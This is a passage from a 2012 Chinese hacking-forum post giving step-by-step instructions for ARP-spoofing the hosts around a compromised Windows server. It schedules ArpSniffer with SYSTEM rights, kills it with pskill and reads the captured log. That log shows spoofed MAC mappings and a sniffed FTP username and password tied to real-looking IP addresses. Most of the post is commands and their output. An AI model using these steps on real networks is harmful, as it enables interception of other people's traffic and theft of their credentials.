C段渗透攻击技术

[复制链接]
查看216 | 回复0 | 2012-4-1 19:15:10 | 显示全部楼层 |阅读模式
LinkDE-528EthernetPCIAdapter

NetworkAdapter1:Intel(R)PRO/100+PCIAdapter(这个地方选第五个参数)



Usage:ArpSniffer<IP1><IP2><SnifferTCPPort><LogFile><NetAdp>[/RESET]



第五步:后台运行开始嗅探咯

C:\winnt\system32>at\\127.0.0.120:44c:\winnt\a.bat



注意:这儿的时间要用24小时式

arpsniffer最好拷到system32目录下,记录文件也会生成在这儿

执行完第四步要先安装WINPCAP2.1驱动

同时arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注册表重启机子



第六步:看密码但是生成的记录文件不能直接看也不能拷贝所以我们只能先结束掉

以SYSTEM权限启动的ARPSniffer程序

C:\winnt\system32>pulist

...................

conime.exe248NTAUTHORITY\SYSTEM

explorer.exe1864SMSCOMPUTER\Administrator

CSRSS.EXE2256NTAUTHORITY\SYSTEM

Arpsniffer.exe2322NTAUTHORITY\SYSTEM----就是它了!

WINLOGON.EXE2344NTAUTHORITY\SYSTEM

......................



杀了它

C:\winnt\system32>pskill2322

PsKillv1.03-localandremoteprocesskiller

Copyright(C)2000MarkRussinovich

http://www.sysinternals.com



Process2322killed.



C:\winnt\system32>type1.txt我的例子中嗅探的是FTP密码:)



...............

61.188.218.179(1404)->61.139.1.79(21)PASSaaabbb

61.139.1.79(21)->61.188.218.179(1404)530Userczy82cannotlogin.

61.139.1.79(21)->61.188.218.179(1404)530Userczy82cannotlogin.

61.188.218.179(1404)->61.139.1.79(21)QUIT

Get61.139.1.65HardwareAddress:00-00-0c-07-ac-02

Get61.139.1.79HardwareAddress:00-b0-d0-22-10-cb

Get61.139.1.88HardwareAddress:00-b0-d0-22-10-c6



Spoof61.139.1.79:Macof61.139.1.65===>Macof61.139.1.88

Spoof61.139.1.65:Macof61.139.1.79===>Macof61.139.1.88

有时这儿要先显示cannotopendriver(0)不管它等一下就可以了

BeginSniffer.........
*
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则